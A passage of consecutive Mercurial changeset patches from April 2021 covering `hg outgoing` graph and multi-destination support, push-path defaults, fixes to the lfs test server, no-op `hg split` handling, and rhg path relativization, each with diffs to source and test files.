complication. As a side effect, `hg out --graph` now use the right return code when they are nothing outgoing. 
This explain the change to output in `tests/test-largefiles-misc.t`. Differential Revision: https://phab.mercurial-scm.org/D10383 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4972,22 +4972,6 @@ ) opts = pycompat.byteskwargs(opts) - if opts.get(b'graph'): - logcmdutil.checkunsupportedgraphflags([], opts) - o, other = hg._outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return - - revdag = logcmdutil.graphrevs(repo, o, opts) - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts, buffered=True) - logcmdutil.displaygraph( - ui, repo, revdag, displayer, graphmod.asciiedges - ) - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return 0 - if opts.get(b'bookmarks'): dest = path.pushloc or path.loc other = hg.peer(repo, opts, dest) diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -32,6 +32,7 @@ error, exchange, extensions, + graphmod, httppeer, localrepo, lock, @@ -1382,18 +1383,29 @@ def outgoing(ui, repo, dest, opts): - + if opts.get(b'graph'): + logcmdutil.checkunsupportedgraphflags([], opts) o, other = _outgoing(ui, repo, dest, opts) ret = 1 try: if o: ret = 0 - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - for n in _outgoing_filter(repo, o, opts): - displayer.show(repo[n]) - displayer.close() + if opts.get(b'graph'): + revdag = logcmdutil.graphrevs(repo, o, opts) + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer( + ui, repo, opts, buffered=True + ) + logcmdutil.displaygraph( + ui, repo, revdag, displayer, graphmod.asciiedges + ) + else: + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + for n in _outgoing_filter(repo, o, opts): + displayer.show(repo[n]) + displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) ret = min(ret, _outgoing_recurse(ui, repo, dest, opts)) return ret # 
exit code is zero since we found outgoing changes diff --git a/tests/test-largefiles-misc.t b/tests/test-largefiles-misc.t --- a/tests/test-largefiles-misc.t +++ b/tests/test-largefiles-misc.t @@ -675,6 +675,7 @@ searching for changes no changes found largefiles: no files to upload + [1] check messages when there are files to upload: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618320779 -7200 # Tue Apr 13 15:32:59 2021 +0200 # Node ID 7061eee84151b4c7118c5b435840dab1bd305bc5 # Parent efc6f6a794bd4b3529cec4a29c4cd7cb997e094d push-dests: rework the handling of default value This new core is more straightforward and doing this early will make the next changeset simpler. Differential Revision: https://phab.mercurial-scm.org/D10384 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -448,9 +448,15 @@ def get_push_paths(repo, ui, dests): """yields all the `path` selected as push destination by `dests`""" if not dests: - dests = [None] - for dest in dests: - yield ui.getpath(dest, default=(b'default-push', b'default')) + if b'default-push' in ui.paths: + yield ui.paths[b'default-push'] + elif b'default' in ui.paths: + yield ui.paths[b'default'] + else: + yield None + else: + for dest in dests: + yield ui.getpath(dest) def get_pull_paths(repo, ui, sources, default_branches=()): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618320632 -7200 # Tue Apr 13 15:30:32 2021 +0200 # Node ID efadec3ea8e225cca6a8f30de20d5d17628c0832 # Parent 7061eee84151b4c7118c5b435840dab1bd305bc5 push-dests: move the code around missing default dest inside `get_push_paths` This function has a clear semantic and moving the code dealing with this inside it will help reduce duplication. 
Differential Revision: https://phab.mercurial-scm.org/D10385 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5703,11 +5703,6 @@ some_pushed = False result = 0 for path in urlutil.get_push_paths(repo, ui, dests): - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) dest = path.pushloc or path.loc branches = (path.branch, opts.get(b'branch') or []) ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -453,7 +453,10 @@ elif b'default' in ui.paths: yield ui.paths[b'default'] else: - yield None + raise error.ConfigError( + _(b'default repository not configured!'), + hint=_(b"see 'hg help config.paths'"), + ) else: for dest in dests: yield ui.getpath(dest) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618408423 -7200 # Wed Apr 14 15:53:43 2021 +0200 # Node ID 248cbe17320339f26003f2b54987e0b3a15835dd # Parent efadec3ea8e225cca6a8f30de20d5d17628c0832 run-test: make it clearer why we are terminating a process The --verbose log was only talking about process termination. Now we have more information about why.
Differential Revision: https://phab.mercurial-scm.org/D10394 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -301,6 +301,7 @@ while time.time() - start < timeout and p.returncode is None: time.sleep(0.1) p.timeout = True + vlog('# Timout reached for process %d' % p.pid) if p.returncode is None: terminate(p) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618408472 -7200 # Wed Apr 14 15:54:32 2021 +0200 # Node ID 9799ba0abb12037b97fdccebead09d808c6d7660 # Parent 248cbe17320339f26003f2b54987e0b3a15835dd test-lfs: avoid pagination Otherwise, the pagination can trigger in when running the test with --debug, blocking the test execution for no good reason. Differential Revision: https://phab.mercurial-scm.org/D10395 diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -40,6 +40,8 @@ #endif $ cat >> $HGRCPATH <<EOF + > [ui] + > paginate=no > [experimental] > lfs.worker-enable = False > [extensions] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618408581 -7200 # Wed Apr 14 15:56:21 2021 +0200 # Node ID 7a9b74e98240195f424ddddd2d701919bdb8bc2e # Parent 9799ba0abb12037b97fdccebead09d808c6d7660 test-lfs: avoid a bashism when spawning the server For zsh, this &> call is read as "& >", this spin the process without redirection. As a result the server grab stdout, which does not get closed at the end of the test. As a result `run-tests.py` hang there forever, waiting for the the stream for be close. (which is probably as issue on its own). 
Differential Revision: https://phab.mercurial-scm.org/D10396 diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -17,7 +17,7 @@ #endif #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif @@ -890,7 +890,7 @@ $ mkdir $TESTTMP/lfs-server2 $ cd $TESTTMP/lfs-server2 #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618409352 -7200 # Wed Apr 14 16:09:12 2021 +0200 # Node ID 8f7b1bf3c540080345112ae06163271bd46ea576 # Parent 7a9b74e98240195f424ddddd2d701919bdb8bc2e test-lfs: fix expected output This is not covered by the CI and was broken. Differential Revision: https://phab.mercurial-scm.org/D10397 diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -115,7 +115,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: 31cf46fbc4ecd458a0943c5b4881f1f5a6dd36c53d6167d5b69ac45149b38e5b @@ -279,7 +279,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: 37a65ab78d5ecda767e8622c248b5dbff1e68b1678ab0e730d5eb8601ec8ad19 @@ -287,7 +287,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) 
Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998 # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1618275116 25200 # Mon Apr 12 17:51:56 2021 -0700 # Node ID 17368844f786cfc9103b033c7c1756aab6d8eeb2 # Parent 8f7b1bf3c540080345112ae06163271bd46ea576 split: add test demonstrating issue with empty splits adjusting phases Differential Revision: https://phab.mercurial-scm.org/D10387 diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1046,3 +1046,117 @@ [ ui.warning|rollback completed] [ ui.error|abort: empty commit message] [10] + +Test that creating an empty split or "no-op" +(identical to original) commit doesn't cause chaos +-------------------------------------------------- + + $ hg init $TESTTMP/noop + $ cd $TESTTMP/noop + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + +FIXME: This should not show "So far it has been split into" + $ printf 'd\na\n' | HGEDITOR=cat hg split || true + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + HG: Splitting ae694b2901bb. So far it has been split into: + HG: - 0:222799e2f90b "r0" + HG: Write commit message for the next split changeset. + foo + + + HG: Enter commit message. Lines beginning with 'HG:' are removed. + HG: Leave message empty to abort commit. + HG: -- + HG: user: test + HG: branch 'default' + HG: added foo + warning: commit already existed in the repository! + saved backup bundle to $TESTTMP/noop/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) + transaction abort! (obsstore-on !) 
+ rollback completed (obsstore-on !) + abort: changeset ae694b2901bb cannot obsolete itself (obsstore-on !) +FIXME: this should not have stripped the commit we just no-op split +(obsstore-off only), or made r0 draft. + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + warning: ignoring unknown working parent ae694b2901bb! (obsstore-off !) + @ draft 1:ae694b2901bb foo (obsstore-on !) + | (obsstore-on !) + o public 0:222799e2f90b r0 (obsstore-on !) + o draft 0:222799e2f90b r0 (obsstore-off !) + + +Now try the same thing but modifying the message so we don't trigger the +identical changeset failures + + $ hg init $TESTTMP/noop2 + $ cd $TESTTMP/noop2 + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + $ cat > $TESTTMP/messages <<EOF + > message1 + > EOF +FIXME: This should not show "So far it has been split into" + $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + EDITOR: HG: Splitting ae694b2901bb. So far it has been split into: + EDITOR: HG: - 0:222799e2f90b "r0" + EDITOR: HG: Write commit message for the next split changeset. + EDITOR: foo + EDITOR: + EDITOR: + EDITOR: HG: Enter commit message. Lines beginning with 'HG:' are removed. + EDITOR: HG: Leave message empty to abort commit. + EDITOR: HG: -- + EDITOR: HG: user: test + EDITOR: HG: branch 'default' + EDITOR: HG: added foo + created new head + saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) +FIXME: this should not have made r0 draft + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:de675559d3f9 message1 (obsstore-off !) 
+ @ draft 2:de675559d3f9 message1 (obsstore-on !) + | + o draft 0:222799e2f90b r0 + +#if obsstore-on +FIXME: this should not have marked 222799e (r0) as a precursor of anything. + $ hg debugobsolete + ae694b2901bb8b0f8c4b5e075ddec0d63468d57a 222799e2f90be09ccbe49f519c4615d8375a9242 de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) +#endif # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1618275166 25200 # Mon Apr 12 17:52:46 2021 -0700 # Node ID 8ee1ac083ee743c9416af8666f5124c62147ceaa # Parent 17368844f786cfc9103b033c7c1756aab6d8eeb2 split: fix issue with empty splits adjusting phases Differential Revision: https://phab.mercurial-scm.org/D10388 diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -171,9 +171,13 @@ b'message': header + ctx.description(), } ) + origctx = repo[b'.'] commands.commit(ui, repo, **pycompat.strkwargs(opts)) newctx = repo[b'.'] - committed.append(newctx) + # Ensure user didn't do a "no-op" split (such as deselecting + # everything). + if origctx.node() != newctx.node(): + committed.append(newctx) if not committed: raise error.InputError(_(b'cannot split an empty revision')) diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1063,7 +1063,6 @@ | o public 0:222799e2f90b r0 -FIXME: This should not show "So far it has been split into" $ printf 'd\na\n' | HGEDITOR=cat hg split || true diff --git a/foo b/foo new file mode 100644 @@ -1076,9 +1075,7 @@ examine changes to 'foo'? (enter ? for help) [Ynesfdaq?] a - HG: Splitting ae694b2901bb. So far it has been split into: - HG: - 0:222799e2f90b "r0" - HG: Write commit message for the next split changeset. + HG: Splitting ae694b2901bb. Write commit message for the first split changeset. foo @@ -1094,13 +1091,12 @@ rollback completed (obsstore-on !) abort: changeset ae694b2901bb cannot obsolete itself (obsstore-on !) 
FIXME: this should not have stripped the commit we just no-op split -(obsstore-off only), or made r0 draft. +(obsstore-off only) $ hg log -G -T'{phase} {rev}:{node|short} {desc}' warning: ignoring unknown working parent ae694b2901bb! (obsstore-off !) @ draft 1:ae694b2901bb foo (obsstore-on !) | (obsstore-on !) - o public 0:222799e2f90b r0 (obsstore-on !) - o draft 0:222799e2f90b r0 (obsstore-off !) + o public 0:222799e2f90b r0 Now try the same thing but modifying the message so we don't trigger the @@ -1121,7 +1117,6 @@ $ cat > $TESTTMP/messages <<EOF > message1 > EOF -FIXME: This should not show "So far it has been split into" $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split diff --git a/foo b/foo new file mode 100644 @@ -1134,9 +1129,7 @@ examine changes to 'foo'? (enter ? for help) [Ynesfdaq?] a - EDITOR: HG: Splitting ae694b2901bb. So far it has been split into: - EDITOR: HG: - 0:222799e2f90b "r0" - EDITOR: HG: Write commit message for the next split changeset. + EDITOR: HG: Splitting ae694b2901bb. Write commit message for the first split changeset. EDITOR: foo EDITOR: EDITOR: @@ -1148,15 +1141,13 @@ EDITOR: HG: added foo created new head saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) -FIXME: this should not have made r0 draft $ hg log -G -T'{phase} {rev}:{node|short} {desc}' @ draft 1:de675559d3f9 message1 (obsstore-off !) @ draft 2:de675559d3f9 message1 (obsstore-on !) | - o draft 0:222799e2f90b r0 + o public 0:222799e2f90b r0 #if obsstore-on -FIXME: this should not have marked 222799e (r0) as a precursor of anything. 
$ hg debugobsolete - ae694b2901bb8b0f8c4b5e075ddec0d63468d57a 222799e2f90be09ccbe49f519c4615d8375a9242 de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) + ae694b2901bb8b0f8c4b5e075ddec0d63468d57a de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) #endif # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1618280734 25200 # Mon Apr 12 19:25:34 2021 -0700 # Node ID ca0049946e9a36ccc4e3e399e0abd577337d9492 # Parent 8ee1ac083ee743c9416af8666f5124c62147ceaa split: avoid strip if split is a no-op (identical to original) Differential Revision: https://phab.mercurial-scm.org/D10389 diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -182,12 +182,15 @@ if not committed: raise error.InputError(_(b'cannot split an empty revision')) - scmutil.cleanupnodes( - repo, - {ctx.node(): [c.node() for c in committed]}, - operation=b'split', - fixphase=True, - ) + if len(committed) != 1 or committed[0].node() != ctx.node(): + # Ensure we don't strip a node if we produce the same commit as already + # exists + scmutil.cleanupnodes( + repo, + {ctx.node(): [c.node() for c in committed]}, + operation=b'split', + fixphase=True, + ) return committed[-1] diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1086,16 +1086,9 @@ HG: branch 'default' HG: added foo warning: commit already existed in the repository! - saved backup bundle to $TESTTMP/noop/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) - transaction abort! (obsstore-on !) - rollback completed (obsstore-on !) - abort: changeset ae694b2901bb cannot obsolete itself (obsstore-on !) -FIXME: this should not have stripped the commit we just no-op split -(obsstore-off only) $ hg log -G -T'{phase} {rev}:{node|short} {desc}' - warning: ignoring unknown working parent ae694b2901bb! (obsstore-off !) - @ draft 1:ae694b2901bb foo (obsstore-on !) - | (obsstore-on !) 
+ @ draft 1:ae694b2901bb foo + | o public 0:222799e2f90b r0 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615625434 -3600 # Sat Mar 13 09:50:34 2021 +0100 # Node ID b5e8bf10436e24a111ec48a7a28edddf43fa12d6 # Parent ca0049946e9a36ccc4e3e399e0abd577337d9492 rhg: Make `files` work on repo-relative paths when possible When the current directory is outside of the repository we need to turn everything into absolute filesystem paths in order to compute correct relative paths. This was previously done unconditionally, but is not necessary when the current directory is inside the repository. With this change `rhg files > /dev/null` at the root of a mozilla-central snapshot goes from ~150 ms to ~70 ms. My repository is located at a somewhat long path though (93 bytes). The effect may not be as pronounced at a shorter path. Differential Revision: https://phab.mercurial-scm.org/D10200 diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -53,21 +53,35 @@ repo: &Repo, files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { - let cwd = HgPathBuf::from(get_bytes_from_path(hg::utils::current_dir()?)); - let working_directory = repo.working_directory_path(); - let working_directory = current_dir()?.join(working_directory); // Make it absolute - let working_directory = - HgPathBuf::from(get_bytes_from_path(working_directory)); - let mut stdout = ui.stdout_buffer(); + let cwd = current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute + let mut any = false; - for file in files { - any = true; - let file = working_directory.join(file); - stdout.write_all(relativize_path(&file, &cwd).as_ref())?; - stdout.write_all(b"\n")?; + if let Ok(cwd_relative_to_repo) = cwd.strip_prefix(&working_directory) { + // The current directory is inside the repo, so we 
can work with + // relative paths + let cwd = HgPathBuf::from(get_bytes_from_path(cwd_relative_to_repo)); + for file in files { + any = true; + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } + } else { + let working_directory = + HgPathBuf::from(get_bytes_from_path(working_directory)); + let cwd = HgPathBuf::from(get_bytes_from_path(cwd)); + for file in files { + any = true; + // Absolute path in the filesystem + let file = working_directory.join(file); + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } } + stdout.flush()?; if any { Ok(()) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618284714 14400 # Mon Apr 12 23:31:54 2021 -0400 # Node ID 9c3e8456907178b2160e180e0a07b49292bc91c1 # Parent b5e8bf10436e24a111ec48a7a28edddf43fa12d6 re2: adjust local variable assignment scope Pytype flagged the exception handler where these are used as `[name-error]`, and PyCharm complained they may be used before assignment. Differential Revision: https://phab.mercurial-scm.org/D10376 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -2189,10 +2189,11 @@ def _checkre2(self): global _re2 global _re2_input + + check_pattern = br'\[([^\[]+)\]' + check_input = b'[ui]' try: # check if match works, see issue3964 - check_pattern = br'\[([^\[]+)\]' - check_input = b'[ui]' _re2 = bool(re2.match(check_pattern, check_input)) except ImportError: _re2 = False # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1617892873 -7200 # Thu Apr 08 16:41:13 2021 +0200 # Node ID cdbef062c6c8a2409caf0d22d75e0f08ff4758fb # Parent 9c3e8456907178b2160e180e0a07b49292bc91c1 changegroup: update comment Gratuitous fix, I stumbled upon this comment while reading code. 
Differential Revision: https://phab.mercurial-scm.org/D10339 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -570,7 +570,7 @@ """ chain = None for chunkdata in iter(lambda: self.deltachunk(chain), {}): - # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags) + # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags, sidedata) yield chunkdata chain = chunkdata[0] # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618455041 14400 # Wed Apr 14 22:50:41 2021 -0400 # Node ID 93c224dc099b6585f72df95a52d7d90226bb9cf0 # Parent cdbef062c6c8a2409caf0d22d75e0f08ff4758fb urlutil: use bytes for Abort messages Caught by pytype. Also fix a minor grammar issue in the second message. Differential Revision: https://phab.mercurial-scm.org/D10433 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -643,11 +643,11 @@ try: subpath = paths[self.url.host] except KeyError: - m = _('cannot use `%s`, "%s" is not a known path') + m = _(b'cannot use `%s`, "%s" is not a known path') m %= (self.rawloc, self.url.host) raise error.Abort(m) if subpath.raw_url.scheme == b'path': - m = _('cannot use `%s`, "%s" is also define as a `path://`') + m = _(b'cannot use `%s`, "%s" is also defined as a `path://`') m %= (self.rawloc, self.url.host) raise error.Abort(m) self.url = subpath.url diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -348,10 +348,10 @@ $ hg id 000000000000 $ hg path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` [255] $ hg pull chain_path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a 
`path://` [255] Doing an actual circle should always be an issue @@ -365,10 +365,10 @@ $ hg id 000000000000 $ hg path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` [255] $ hg pull chain_path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` [255] Test basic error cases # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618471399 -7200 # Thu Apr 15 09:23:19 2021 +0200 # Node ID 5a59a0ed0a379df7b19243ea739bee5422afd722 # Parent 93c224dc099b6585f72df95a52d7d90226bb9cf0 subrepo: introduce a `repo_rel_or_abs_source` function The `subrepoutil` module has various function to compute the path of a sub-repository compared to the root of the top repository. However, they was no function available to compute the relative path of the repository "source". And we need this information for exchange operation (in our case, `hg outgoing`). The information is currently build using the `repo._subtoppath` hack. We reuse the same logic but in a dedicated function independent of the `repo._subtoppath` hack. 
Differential Revision: https://phab.mercurial-scm.org/D10434 diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -383,6 +383,24 @@ return subs, commitsubs, newstate +def repo_rel_or_abs_source(repo): + """return the source of this repo + + Either absolute or relative the outermost repo""" + parent = repo + chunks = [] + while util.safehasattr(parent, b'_subparent'): + source = urlutil.url(parent._subsource) + chunks.append(bytes(source)) + if source.isabs(): + break + parent = parent._subparent + + chunks.reverse() + path = posixpath.join(*chunks) + return posixpath.normpath(path) + + def reporelpath(repo): # type: (localrepo.localrepository) -> bytes """return path to this (sub)repo as seen from outermost repo""" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618471408 -7200 # Thu Apr 15 09:23:28 2021 +0200 # Node ID 0afe96e374a79e4d776606bf73e79230db474ec3 # Parent 5a59a0ed0a379df7b19243ea739bee5422afd722 outgoing: pass subrepo path using function argument instead of abssource hack This is clearer, remove the needs for the `repo._subtoppath` hack and will make our live easier when making `outgoing` accept multiple destinations. 
Differential Revision: https://phab.mercurial-scm.org/D10390 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4985,11 +4985,7 @@ finally: other.close() - repo._subtoppath = path.pushloc or path.loc - try: - return hg.outgoing(ui, repo, dest, opts) - finally: - del repo._subtoppath + return hg.outgoing(ui, repo, dest, opts) @command( diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1320,7 +1320,7 @@ return _incoming(display, subreporecurse, ui, repo, source, opts) -def _outgoing(ui, repo, dest, opts): +def _outgoing(ui, repo, dest, opts, subpath=None): path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( @@ -1328,6 +1328,15 @@ hint=_(b"see 'hg help config.paths'"), ) dest = path.pushloc or path.loc + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + dest = bytes(subpath) + else: + p = urlutil.url(dest) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + dest = bytes(p) + branches = path.branch, opts.get(b'branch') or [] ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) @@ -1382,10 +1391,10 @@ yield n -def outgoing(ui, repo, dest, opts): +def outgoing(ui, repo, dest, opts, subpath=None): if opts.get(b'graph'): logcmdutil.checkunsupportedgraphflags([], opts) - o, other = _outgoing(ui, repo, dest, opts) + o, other = _outgoing(ui, repo, dest, opts, subpath=subpath) ret = 1 try: if o: diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -873,7 +873,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.outgoing(ui, self._repo, dest, opts, subpath=subpath) @annotatesubrepoerror def incoming(self, ui, source, opts): # HG changeset patch # 
User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618356404 -7200 # Wed Apr 14 01:26:44 2021 +0200 # Node ID d4e4ccb75f99f24baa5912885d9360dd5e87cda3 # Parent 0afe96e374a79e4d776606bf73e79230db474ec3 outgoing: accept multiple destinations This align the behavior of `hg outgoing` with the one of `hg incoming`. In addition this prepare the introduction of having simple `path` resolve to multiple destination in practice (eg: `default`) Differential Revision: https://phab.mercurial-scm.org/D10391 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4923,10 +4923,10 @@ + logopts + remoteopts + subrepoopts, - _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]'), + _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, ) -def outgoing(ui, repo, dest=None, **opts): +def outgoing(ui, repo, *dests, **opts): """show changesets not found in the destination Show changesets not found in the specified destination repository @@ -4962,30 +4962,24 @@ Returns 0 if there are outgoing changes, 1 otherwise. """ - # hg._outgoing() needs to re-resolve the path in order to handle #branch - # style URLs, so don't overwrite dest. 
- path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - opts = pycompat.byteskwargs(opts) if opts.get(b'bookmarks'): - dest = path.pushloc or path.loc - other = hg.peer(repo, opts, dest) - try: - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) - ui.pager(b'outgoing') - return bookmarks.outgoing(ui, repo, other) - finally: - other.close() - - return hg.outgoing(ui, repo, dest, opts) + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + other = hg.peer(repo, opts, dest) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(dest) + ) + ui.pager(b'outgoing') + return bookmarks.outgoing(ui, repo, other) + finally: + other.close() + + return hg.outgoing(ui, repo, dests, opts) @command( diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1320,51 +1320,53 @@ return _incoming(display, subreporecurse, ui, repo, source, opts) -def _outgoing(ui, repo, dest, opts, subpath=None): - path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = 